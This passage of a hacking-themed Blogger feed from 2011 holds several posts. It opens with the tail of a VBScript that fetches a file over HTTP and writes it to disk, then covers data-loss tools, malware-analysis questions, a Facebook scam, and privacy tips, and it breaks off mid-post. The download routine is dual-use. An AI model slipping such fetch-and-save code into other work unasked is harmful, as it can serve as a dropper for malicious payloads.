&lt;i&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;XmlHttp.Send&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;OutputStream.Type = BINARY_STREAM_TYPE&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;OutputStream.Open&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;OutputStream.Write XmlHttp.responseBody&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;OutputStream.SaveToFile FileName, CREATE_OVERWRITE_SAVE_MODE&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;OutputStream.Close&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;StdOut.Close&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;set XmlHttp = nothing&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;set AsynchRequest = nothing&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;set OutputStream = nothing&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;
&lt;span style="color: blue;"&gt;&lt;b&gt;I&lt;/b&gt;&lt;/span&gt;&lt;b&gt;n Order to compile these scripts,we need WSH Interpreters. here i amwriting a little overview of WSH Interpreters.&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: left;"&gt;
&lt;b&gt;WSH can be run in protected-mode using the Wscript.exe interpreter (typically&lt;/b&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;b&gt;used for scripts that require user interaction via popup dialog windows) or in real-mode&lt;/b&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;b&gt;using the command line Cscript.exe (Microsoft, 2007). Unless otherwise noted, scripts&lt;/b&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;b&gt;mentioned in this paper are intended to be executed via the command line Cscript.exe&lt;/b&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;b&gt;interpreter.&lt;/b&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;b&gt;WSH scripts are written in either JScript or VBScript as uncompiled text files&lt;/b&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;b&gt;with extensions of&lt;span class="Apple-style-span" style="color: blue;"&gt; “.js” or “.vbs”&lt;/span&gt; respectively. The Microsoft TechNet&lt;/b&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;b&gt;(&lt;a href="http://technet.microsoft.com/"&gt;http://technet.microsoft.com&lt;/a&gt;) and MSDN (&lt;a href="http://msdn.microsoft.com/"&gt;http://msdn.microsoft.com/&lt;/a&gt;) sites provide&lt;/b&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;b&gt;extensive documentation and examples of WSH scripting.&lt;/b&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: blue;"&gt;&lt;b&gt;&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span class="fullpost"&gt;

&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5015567148035666316-6392272053159415277?l=hackton.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackton.blogspot.com/feeds/6392272053159415277/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackton.blogspot.com/2011/08/retreive-external-files-via-http-using.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5015567148035666316/posts/default/6392272053159415277?v=2'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5015567148035666316/posts/default/6392272053159415277?v=2'/><link rel='alternate' type='text/html' href='http://hackton.blogspot.com/2011/08/retreive-external-files-via-http-using.html' title='Retreive External files Via HTTP using WHS Scritps'/><author><name>Shubham Mittal</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://4.bp.blogspot.com/-3jlnVekevSo/TyjxQ-R-auI/AAAAAAAABCM/7RfqLdCZP74/s220/Image0098.jpg'/></author><thr:total>0</thr:total></entry><entry gd:etag='W/&quot;C0cBQns4fCp7ImA9WhZVEk4.&quot;'><id>tag:blogger.com,1999:blog-5015567148035666316.post-6255810809788609787</id><published>2011-05-24T02:56:00.000-07:00</published><updated>2011-05-24T02:57:33.534-07:00</updated><app:edited xmlns:app='http://www.w3.org/2007/app'>2011-05-24T02:57:33.534-07:00</app:edited><category scheme='http://www.blogger.com/atom/ns#' term='Lists'/><category scheme='http://www.blogger.com/atom/ns#' term='d'/><category scheme='http://www.blogger.com/atom/ns#' term='Security'/><category scheme='http://www.blogger.com/atom/ns#' term='FreeDownloads'/><category scheme='http://www.blogger.com/atom/ns#' term='FreeLinks'/><category scheme='http://www.blogger.com/atom/ns#' term='FreeStuff'/><title>Tools to prevent data loss</title><content type='html'>&lt;m:smallfrac m:val="off"&gt;    &lt;m:dispdef&gt;    &lt;m:lmargin m:val="0"&gt;    &lt;m:rmargin m:val="0"&gt;    &lt;m:defjc m:val="centerGroup"&gt;    &lt;m:wrapindent m:val="1440"&gt;    &lt;m:intlim m:val="subSup"&gt;    &lt;m:narylim m:val="undOvr"&gt;&lt;br /&gt;
&lt;/m:narylim&gt;&lt;/m:intlim&gt; &lt;/m:wrapindent&gt;  &lt;/m:defjc&gt;&lt;/m:rmargin&gt;&lt;/m:lmargin&gt;&lt;/m:dispdef&gt;&lt;/m:smallfrac&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://miltonalexander.com/Images/DataLossPreventionBusinessAdvisoryBanner.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="172" src="http://miltonalexander.com/Images/DataLossPreventionBusinessAdvisoryBanner.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;Data loss refers to unexpected loss of data or information and therefore backup and recovery of data must be developed to restore the lost data.&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal"&gt;Here I am including some of the best tools to prevent data loss :&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;a href="http://products.enterpriseitplanet.com/security/anti-spam/1179512703.html"&gt;Security platform: BorderWare &lt;/a&gt;security platform removes the need for deploying a new device to protect against new messaging applications by integrating email, IM , web security with a single policy and single security system. It is actually a monitoring and filtering tool which prevents data leakage.&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;a href="http://www.checkpoint.com/products/full-disk-encryption/index.html"&gt;Check Point Software: Pointsec &lt;/a&gt;data encryption solutions by check point provide data protection on laptops, PCs, mobile device, and removable media. By leveraging a strong and efficient blend of full disk encryption, access control, port management, removable media encryption , it delivers a comprehensive data security.&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;a href="http://www.crossroads.com/Products/ProductsOverview.asp"&gt;Cross Road Systems – DBProtector&lt;/a&gt; : it provides database security at a logical business policy level and stops “authorized misuse” of database information. DBProtector provides policy-based intrusion detection, prevention, and compliance auditing.&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;a href="http://www.frontrange.com/software/it-asset-management/endpoint-security/"&gt;Device Wall : &lt;/a&gt;it prevents the transfer of files to or from unauthorized portable devices. It also automatically encrypts data copied to approved devices. Moreover it also provide complete audits trails of device and file access.&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;a href="http://www.bobsguide.com/guide/prod/6-v-9730-1-exeros-discovery-formerly-exeros-datamapper.html"&gt;Exeros Discovery:&lt;/a&gt; Exeros discovery software automates discovery and maintenance of business rules, transformations, hidden sensitive data, and data inconsistencies across structured data sources. It uses a unique technology of data driven mapping to replace the traditional manual process of analyzing source data and mapping it to another dataset.&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;a href="http://www.hp.com/rnd/pdf_html/IDM_technical_brief.htm"&gt;Procurve Identity Driven manager&lt;/a&gt; : Procurve Identity Driven Manager configures security and performance settings based on system, user, device, location, time, client system state. It enables us to to be able to centrally define and apply policy-based network access rights that allow network to automatically adapt to needs of users and devices as they connect.&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;a href="http://www.prismmicrosys.com/EventTrackerSIEM/index.php"&gt;Event Tracker: &lt;/a&gt;being my favorite event tracker is solution that features real time collection of all logs, secure, tamper-proof and encrypted log storage, and real tie slog analysis, and reporting as well.&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;a href="http://www.verdasys.com/data_loss_prevention.php"&gt;Verdasys’ Digital Guardian&lt;/a&gt; is a data security solution for protecting and tracking the flow of critical data. Digital Guardian logs user data transactions and applies predefined rules to ensure that end users are using applications and data properly.&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;a href="http://www.websense.com/content/data-security-solutions.aspx"&gt;Websense Content protection suite:&lt;/a&gt; This package is a comprehensive solution to address the growing need for robust information leak prevention. It provides superior protection to secure and manage , who, what, how and where.&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;a href="http://www.elcomsoft.com/news/268.html"&gt;Elcomsoft Distributed Password recovery:&lt;/a&gt; Elcomsoft password recovery is a password recovery tool , as it suggests from its name ;) . It is used to crack complex passwords, recover strong encryption keys, and unlock ducuments in a protected environment. It is a high end solution for forensic and government agencies, data recovery, and password recovery services. &lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5015567148035666316-6255810809788609787?l=hackton.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackton.blogspot.com/feeds/6255810809788609787/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackton.blogspot.com/2011/05/list-of-tools-to-prevent-data-loss.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5015567148035666316/posts/default/6255810809788609787?v=2'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5015567148035666316/posts/default/6255810809788609787?v=2'/><link rel='alternate' type='text/html' href='http://hackton.blogspot.com/2011/05/list-of-tools-to-prevent-data-loss.html' title='Tools to prevent data loss'/><author><name>Shubham Mittal</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://4.bp.blogspot.com/-3jlnVekevSo/TyjxQ-R-auI/AAAAAAAABCM/7RfqLdCZP74/s220/Image0098.jpg'/></author><thr:total>1</thr:total></entry><entry gd:etag='W/&quot;CUcNRH4_fCp7ImA9WhZWFkw.&quot;'><id>tag:blogger.com,1999:blog-5015567148035666316.post-8969808928895072698</id><published>2011-05-16T23:18:00.000-07:00</published><updated>2011-05-16T23:18:15.044-07:00</updated><app:edited xmlns:app='http://www.w3.org/2007/app'>2011-05-16T23:18:15.044-07:00</app:edited><category scheme='http://www.blogger.com/atom/ns#' term='Forensics'/><title>Some questions to be answered during Malware Analysis</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://infolookup.securegossip.com/files/malware-analysis.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="233" src="http://infolookup.securegossip.com/files/malware-analysis.png" width="400" /&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;
&lt;/div&gt;Analysis means to study something. And so , the Malware analysis can be defined as "taking the malware apart to study it". While studying malware, our purpose must be to answer some of the questions. These questions may be classified into two groups. One, consistig of "bussiness questions" and other including "technical questions".&lt;br /&gt;
&lt;br /&gt;
Bussiness questions may include the following key questions :- &lt;br /&gt;
&lt;ol&gt;&lt;li&gt;&lt;b&gt;What is the purpose of malware?&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;&lt;b&gt; How to get rid of that malware?&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;&amp;nbsp;How did it get there? &lt;/b&gt;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;Who may be targetting us?&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;What did they steal?&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;How long it has been here and infecting us?&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;Does it spread on its own?&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;How to find it on other machines?&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;How to prevent this to infect us any further?&lt;/b&gt;&lt;/li&gt;
&lt;/ol&gt;Same way, technical questions may be listed as follows :-&lt;br /&gt;
&lt;br /&gt;
&lt;ol&gt;&lt;li&gt;&lt;b&gt;What network-based indicators can reveal the presence and activity of malware?&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;What host-based indicators can reveal the presence and activity of malware?&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;Is the malware persistent? What is the mechanism to keep it running after rebooting of machine?&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;Is the program based on some other tool?&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;Malware is written in which language?&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;When the program was written, compiled and installed?&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;Is the program packed? Which packer is used for this purpose?&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;Does the program has any anti-debugging functionality?&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;Doest the program include any rootkit? &lt;br /&gt;
&lt;/b&gt;These were some of the questions that may help you to reach some conclusion in ur "malware analysis" if answered.&amp;nbsp;&lt;/li&gt;
&lt;/ol&gt;Hope this wud help you somehow. Have fun. Enjoy HaCKING, Enjoy HaCKTON.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5015567148035666316-8969808928895072698?l=hackton.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackton.blogspot.com/feeds/8969808928895072698/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackton.blogspot.com/2011/05/some-questions-to-be-answered-during.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5015567148035666316/posts/default/8969808928895072698?v=2'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5015567148035666316/posts/default/8969808928895072698?v=2'/><link rel='alternate' type='text/html' href='http://hackton.blogspot.com/2011/05/some-questions-to-be-answered-during.html' title='Some questions to be answered during Malware Analysis'/><author><name>Shubham Mittal</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://4.bp.blogspot.com/-3jlnVekevSo/TyjxQ-R-auI/AAAAAAAABCM/7RfqLdCZP74/s220/Image0098.jpg'/></author><thr:total>1</thr:total></entry><entry gd:etag='W/&quot;CUQNQHY4eyp7ImA9WhZWFUs.&quot;'><id>tag:blogger.com,1999:blog-5015567148035666316.post-1714391429625564648</id><published>2011-05-16T09:29:00.000-07:00</published><updated>2011-05-16T09:29:51.833-07:00</updated><app:edited xmlns:app='http://www.w3.org/2007/app'>2011-05-16T09:29:51.833-07:00</app:edited><category scheme='http://www.blogger.com/atom/ns#' term='Security'/><category scheme='http://www.blogger.com/atom/ns#' term='facebook'/><title>Enable/Disable Button Scam Spreading on facebook</title><content type='html'>Researchers from Sophos have spotted a currently circulating &lt;a href="http://nakedsecurity.sophos.com/2011/05/16/facebook-dislike-button-spreads-fast-but-is-a-fake-watch-out/"&gt;&lt;strong&gt;“Enable Dislike Button” Facebook scam&lt;/strong&gt;&lt;/a&gt;.&lt;br /&gt;
Upon clicking on the what looks like a recently added genuine Facebook feature, users are exposed to a “&lt;em&gt;Follow the steps below to get the Dislike button&lt;/em&gt;” instructions page similar to the one seen in the Osama Execution Video Scam&lt;strong&gt;.&lt;/strong&gt;&lt;br /&gt;
&lt;br /&gt;
Spamvertised as:&lt;br /&gt;
&lt;blockquote&gt;Facebook now has a dislike button! Click ‘Enable Dislike Button’ to turn on the new feature!&lt;/blockquote&gt;&lt;br /&gt;
&lt;div style="text-align: center;"&gt;&lt;a href="http://hackplanet.in/"&gt;&lt;img alt="" class="size-full wp-image-8657 aligncenter" height="314" src="http://i.zdnet.com/blogs/dislike-button-address-bar.jpg" width="475" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
Once the users copy and paste the obfuscated javascript in their  browsers, all of their friends will be spamvertised with a wall post  about the non-existent Dislike feature. The campaigners appear to be  monetizing the campaign through a survey scam.&lt;br /&gt;
&lt;br /&gt;
For the time being, Facebook doesn’t offer a dislike button.&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;And for any such confirmation, visit official facebook blog sites rather then believing the general people.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5015567148035666316-1714391429625564648?l=hackton.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackton.blogspot.com/feeds/1714391429625564648/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackton.blogspot.com/2011/05/enabledisable-button-scam-spreading-on.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5015567148035666316/posts/default/1714391429625564648?v=2'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5015567148035666316/posts/default/1714391429625564648?v=2'/><link rel='alternate' type='text/html' href='http://hackton.blogspot.com/2011/05/enabledisable-button-scam-spreading-on.html' title='Enable/Disable Button Scam Spreading on facebook'/><author><name>Shubham Mittal</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://4.bp.blogspot.com/-3jlnVekevSo/TyjxQ-R-auI/AAAAAAAABCM/7RfqLdCZP74/s220/Image0098.jpg'/></author><thr:total>0</thr:total></entry><entry gd:etag='W/&quot;CUUGSXY-cSp7ImA9WhZWFUs.&quot;'><id>tag:blogger.com,1999:blog-5015567148035666316.post-3853219814187867782</id><published>2011-05-16T09:27:00.000-07:00</published><updated>2011-05-16T09:27:08.859-07:00</updated><app:edited xmlns:app='http://www.w3.org/2007/app'>2011-05-16T09:27:08.859-07:00</app:edited><category scheme='http://www.blogger.com/atom/ns#' term='Security'/><category scheme='http://www.blogger.com/atom/ns#' term='Tips'/><category scheme='http://www.blogger.com/atom/ns#' term='facebook'/><title>How to be safe on Facebook in times of spams.</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://gtweet.files.wordpress.com/2010/11/t1larg-facebook-settings-courtesy.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="225" src="http://gtweet.files.wordpress.com/2010/11/t1larg-facebook-settings-courtesy.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;h3 style="font-weight: normal;"&gt;&lt;span style="font-size: small;"&gt;In this time of increasing frauds, spams and hacks going on, how could facebook (world's second m,ost used website) be spared. You can see some new spam or hack methodology coming out everyday and compromising accounts of lame people. For those who are noobs to such things, there are some of the settings which must be implemented in order to be safe from such stuff. here are some of those settings.&lt;/span&gt;&lt;/h3&gt;&lt;h3&gt;1. Who can see what?&lt;/h3&gt;Your first stop should be your privacy settings, which you can get to under "Account" at the top right of any page.&lt;br /&gt;
Here,  make sure you're using a set of custom settings. Click "Customize  settings" under the grid on that page to see who can see which parts of  your Facebook profile.&lt;br /&gt;
Unless you use your Facebook account as  a public page, every option should at least be set to "Friends Only."  From there, you can make each setting more specific, keeping your photos  hidden for certain people, for example.&lt;br /&gt;
&lt;h3&gt;2. Place your friends in lists&lt;/h3&gt;To make the previous tip more powerful, place your Facebook friends  in lists. If you begin to define lists such as Coworkers, Best Friends,  Employees, Students, etc., you can set each of your settings to be  visible or not visible to a whole list of people.&lt;br /&gt;
To do this go to "Edit Friends" under the Account menu. Type in a friend's name and add it to a list.&lt;br /&gt;
Then  you can make sure that only your best friends, for example, can see the  photos you post. Or you can make sure that your students or employees  don't see your status updates.&lt;br /&gt;
You can also add a friend to a list as you accept their friend request.&lt;br /&gt;
&lt;h3&gt;3. How secure is your password?&lt;/h3&gt;This is the front line to your Facebook security and should be taken  seriously. Good passwords include capital letters, punctuation, numbers  and words that can't be found in the dictionary.&lt;br /&gt;
Resist using anything that someone who knows you well enough could guess (kids, pets, phone numbers, etc.).&lt;br /&gt;
If  you think for any reason that your account's security has been  breached, change your password immediately. Doing so will end every  active session of Facebook for your account, locking out anyone else but  you.&lt;br /&gt;
&lt;h3&gt;4. Who can find you?&lt;/h3&gt;Facebook also allows you to set what people see if they're not your  friend. Under privacy settings, click "View Settings" under the  "Connecting on Facebook" setting at the top of the page.&lt;br /&gt;
Here, you can set what people see when they search for you on Facebook.&lt;br /&gt;
Pay  special note to the bottom option, which allows you to set who can see  what you have "liked" on Facebook. Many don't realize that by default  this option is set to show everyone on the Web what you like.&lt;br /&gt;
Don't want that future employer to know that you "like" naps or skipping class? This is a good thing to check.&lt;br /&gt;
&lt;h3&gt;5. What does my profile look like to Grandpa?&lt;/h3&gt;Even the most conscientious Facebook user can miss a check box or  two, putting his or her entire weekend escapade on Facebook for Grandpa  to see.&lt;br /&gt;
But the good news is that you can preview what your  profile looks like to any of your friends, many of whom can see  different things depending on how advanced you have set your privacy  settings.&lt;br /&gt;
In your privacy settings, click "Customize Settings" then "Preview My Profile."&lt;br /&gt;
Here, you'll be able to type in any friend's name and see exactly what they see. Very handy.&lt;br /&gt;
&lt;h3&gt;6. Browse Facebook securely&lt;/h3&gt;One of Facebook's most vulnerable features is that much of your  browsing is done without a secure connection to the Web site. Hackers  have exploited this hole by accessing your personal information if you  use Facebook on a public or unsecured WiFi network.&lt;br /&gt;
In your  account settings, choose Account Security. There's a check box there to  enable secure browsing whenever possible. Check that.&lt;br /&gt;
You'll soon see that Facebook will be using https:// instead of http://. That's how you know you're more secure.&lt;br /&gt;
&lt;h3&gt;7. Who is logging in as you?&lt;/h3&gt;One of Facebook's greatest security features is the ability to  individually approve each computer or mobile device that logs into your  account.&lt;br /&gt;
You can name each computer you use Facebook with (work, home, laptop, iPhone, etc.).&lt;br /&gt;
To  turn this on, go to your account settings, click on "Account Security"  and choose that you want an e-mail or text message when someone tries to  log in from a computer that isn't one you've approved.&lt;br /&gt;
Here,  you can also see all the open sessions of Facebook tied to your account.  Someone logging in from five states away? Click "end activity" and  they'll be stopped in their tracks.&lt;br /&gt;
&lt;h3&gt;8. Which apps know you?&lt;/h3&gt;As we have used Facebook over the years, each of us has amassed lists  of applications that have access to our Facebook information.&lt;br /&gt;
To  see which apps currently have access to your Facebook information, go  to your privacy settings and click edit under "Apps and Websites" at the  bottom left of the page.&lt;br /&gt;
On the next page, click edit settings next to "Apps you use." &lt;br /&gt;
Here,  you'll see a list of all the apps that have your information on file.  Many of them are used for convenience, such as integration with the  popular Instagram photo-sharing app or commenting services on news Web  sites. But there are certainly some you could lose.&lt;br /&gt;
Click the X next to any app from which you want your information yanked.&lt;br /&gt;
&lt;h3&gt;9. Even your friends' apps know you, too&lt;/h3&gt;This one is even scarier. On the same app privacy page, check out the subhead that says "Info accessible through your friends."&lt;br /&gt;
You  may not know it, but anything your friends can see on Facebook can also  be seen by any app that your friends add on Facebook — including apps  that you have no idea were ever given access.&lt;br /&gt;
To disallow  this, click on edit settings and uncheck all the boxes that allow you to  choose what can be shared with apps that your friends add. Click save.&lt;br /&gt;
&lt;h3&gt;10. Who can post on your wall?&lt;/h3&gt;&lt;br /&gt;
&lt;br /&gt;
Many of these spammy links are clickjacking schemes, which spread by posting links on a bunch of your friends' walls. &lt;br /&gt;
The only foolproof way to prevent these links from gumming up  your own wall is to set it so no one can post directly on your wall.  Friends can still comment on your status messages, links and photos, but  won't have the ability to leave you a public note. &lt;br /&gt;
To change this setting, head to the customize settings area under  privacy. Then uncheck the "Enable" box where it allows friends to post  on your wall.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5015567148035666316-3853219814187867782?l=hackton.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackton.blogspot.com/feeds/3853219814187867782/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackton.blogspot.com/2011/05/how-to-be-safe-on-facebook-in-times-of.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5015567148035666316/posts/default/3853219814187867782?v=2'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5015567148035666316/posts/default/3853219814187867782?v=2'/><link rel='alternate' type='text/html' href='http://hackton.blogspot.com/2011/05/how-to-be-safe-on-facebook-in-times-of.html' title='How to be safe on Facebook in times of spams.'/><author><name>Shubham Mittal</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://4.bp.blogspot.com/-3jlnVekevSo/TyjxQ-R-auI/AAAAAAAABCM/7RfqLdCZP74/s220/Image0098.jpg'/></author><thr:total>0</thr:total></entry><entry gd:etag='W/&quot;CkMMQng9eCp7ImA9WhZWEU4.&quot;'><id>tag:blogger.com,1999:blog-5015567148035666316.post-2934341526517163850</id><published>2011-05-11T09:14:00.000-07:00</published><updated>2011-05-11T09:14:43.660-07:00</updated><app:edited xmlns:app='http://www.w3.org/2007/app'>2011-05-11T09:14:43.660-07:00</app:edited><category scheme='http://www.blogger.com/atom/ns#' term='SystemZone'/><category scheme='http://www.blogger.com/atom/ns#' term='Tips'/><category scheme='http://www.blogger.com/atom/ns#' term='FreeStuff'/><title>General Advice For Improving RAM performance</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://technabob.com/blog/wp-content/uploads/2009/02/usb_ram_card.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="299" src="http://technabob.com/blog/wp-content/uploads/2009/02/usb_ram_card.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span class="fullpost"&gt;So, guys going a l'l bit away frm leak, this time related to system performance rather than some hacking stuff :)&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class="fullpost"&gt;As far as performance of RAM is concerned, here are some of the additional tips for making better&lt;br /&gt;
use of your existing RAM:&lt;/span&gt;&lt;br /&gt;
&lt;span class="fullpost"&gt;&lt;br /&gt;
&lt;b&gt;Remove DLLs from cache memory&lt;/b&gt;&lt;br /&gt;
If you notice your system running slowly after Windows has been running for some time, or if your&lt;br /&gt;
RAM seems to be getting low for some reason, the culprit might be left-behind DLLs from programs&lt;br /&gt;
that are no longer running, but that Windows still keeps in memory. Sometimes Windows keeps&lt;br /&gt;
DLLs in cache memory even when the program that required them is no longer running, and this&lt;br /&gt;
cuts down on the memory available to other applications.&lt;/span&gt;&lt;br /&gt;
&lt;span class="fullpost"&gt;&lt;br /&gt;
&lt;b&gt;You can use a simple Registry hack to have &lt;/b&gt;Windows automatically remove from cache memory&lt;br /&gt;
DLLs that are no longer needed by programs. Run the Registry Editor [Hack #183] and go to HKEY_&lt;br /&gt;
